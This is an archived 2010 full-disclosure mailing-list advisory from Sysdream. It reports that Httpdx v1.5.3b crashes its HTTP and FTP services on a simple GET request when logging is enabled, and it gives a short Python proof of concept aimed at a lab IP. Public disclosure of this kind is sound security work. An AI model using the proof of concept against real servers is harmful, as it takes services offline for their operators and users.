| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 19 Mar 2010 15:48:21 +0100 From: Mehdi Mahdjoub - Sysdream IT Security Services <m.mahdjoub@...dream.com> To: bugtraq@...urityfocus.com Cc: full-disclosure@...ts.grok.org.uk Subject: Vulnerability Httpdx v1.5.3b Program : Httpdx v1.5.3b PoC : Remote Crash Service (if http.log=1) Homepage : http://sourceforge.net/projects/httpdx/ Found by : Jonathan Salwan This Advisory : Jonathan Salwan Contact : j.salwan@...dream.com //----- Application description Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. //----- Description of vulnerability The vulnerability is caused due to set http.log=1 in httpdx.conf - Error Writting log This can be exploited to crash all services http & ftp. Use simple GET request for crash service. //----- Credits http://www.sysdream.com/article.php?story_id=325§ion_id=78 http://www.shell-storm.org import urllib import urllib2 url = 'http://172.16.240.128/' req = urllib2.Request(url) answer = urllib2.urlopen(req) page = answer.read() _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists